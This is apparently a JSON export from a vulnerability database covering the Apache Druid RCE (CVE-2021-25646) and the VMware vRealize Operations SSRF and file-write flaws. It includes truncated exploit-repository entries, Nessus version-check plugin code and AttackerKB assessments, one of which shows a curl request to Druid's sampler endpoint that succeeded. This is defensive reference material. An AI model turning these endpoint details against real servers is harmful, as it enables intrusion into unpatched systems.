{"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:39:08", "description": "# CVE-2021-25646-GUI\n\n\u5b66\u4e60`C...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-04T12:51:01", "type": "githubexploit", "title": "Exploit for Vulnerability in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-09-09T06:48:52", "id": "AB767826-96D0-59A5-8589-55AACA694FBA", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:18:34", "description": "# Apache Druid RCE\n\n# title=\"druid\" && title==\"Apache Druid\"\n\nPO...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-03T06:45:54", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-02-04T01:40:33", "id": "5742BA27-07D1-52F4-BB97-BE458480BFFA", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:07:18", "description": "**Apache Druid \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c**\n\n\u6f0f\u6d1e\u6982\u8981\n\nApache Druid \u5b98\u65b9\u53d1\u5e03\u5b89\u5168\u66f4\u65b0\uff0c\u901a\u62a5\u4e86\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-03T03:59:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2022-07-07T04:40:08", "id": "C598A802-888D-5C28-A03B-FB6C86310037", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-28T03:14:36", "description": "# Apache Druid \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c CVE-2021-25646\nby j2ekim\n\n## \u4f7f\u7528\u65b9\u6cd5\n\n ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-12T14:40:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2022-03-23T05:51:41", "id": "2427E2EE-38C6-5204-B121-594782A77A97", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-25T19:01:57", "description": "## 0x01 \u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-01T01:14:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "modified": "2022-03-25T11:15:15", "id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "nessus": [{"lastseen": "2023-01-11T14:44:35", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-03-09T15:14:07", "description": "A change introduced in Apache Druid prior to 0.20.1 allows attackers to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an unauthenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-30T00:00:00", "type": "nessus", "title": "Apache Druid < 0.20.1 RCE (Direct Check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:apache:druid"], "id": "APACHE_DRUID_CVE-2021-25646.NBIN", "href": "https://www.tenable.com/plugins/nessus/148241", "sourceData": "Binary data apache_druid_cve-2021-25646.nbin", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-10-30T15:47:25", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-03-25T15:20:50", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-20T20:10:06", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.\n\n \n**Recent assessments:** \n \n**wvu-r7** at February 06, 2021 3:30am UTC reported:\n\nFrom Wikipedia:\n\n> **Druid is a column-oriented, open-source, distributed data store written in Java.** Druid is designed to quickly ingest massive quantities of event data, and provide low-latency queries on top of the data.[1] The name Druid comes from the shapeshifting Druid class in many role-playing games, to reflect the fact that the architecture of the system can shift to solve different types of data problems.\n> \n> Druid is commonly used in business intelligence/OLAP applications to analyze high volumes of real-time and historical data.[2] **Druid is used in production by technology companies such as Alibaba,[2] Airbnb,[2] Cisco,[3][2] eBay,[4] Lyft,[5] Netflix,[6] PayPal,[2] Pinterest,[7] Twitter,[8] Walmart,[9] Wikimedia Foundation[10] and Yahoo.[11]**\n\nContrary to the CVE description, this appears to be both **unauthenticated** and **vulnerable in the default configuration** of Apache Druid 0.20.0, at least [from Docker](<https://druid.apache.org/docs/latest/tutorials/docker.html>)?\n \n \n wvu@kharak:~/Downloads$ curl -vH \"Content-Type: application/json\" http://127.0.0.1:8888/druid/indexer/v1/sampler -d @payload.json\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)\n > POST /druid/indexer/v1/sampler HTTP/1.1\n > Host: 127.0.0.1:8888\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json\n > Content-Length: 949\n >\n * upload completely sent off: 949 out of 949 bytes\n < HTTP/1.1 200 OK\n < Date: Sat, 06 Feb 2021 02:23:07 GMT\n < Date: Sat, 06 Feb 2021 02:23:07 GMT\n < Content-Type: application/json\n < Vary: Accept-Encoding, User-Agent\n < Content-Length: 999\n <\n * Connection #0 to host 127.0.0.1 left intact\n {\"numRowsRead\":1,\"numRowsIndexed\":1,\"data\":[{\"input\":{\"name\":\"Wikipedia Edits\",\"description\":\"Edits on Wikipedia from one 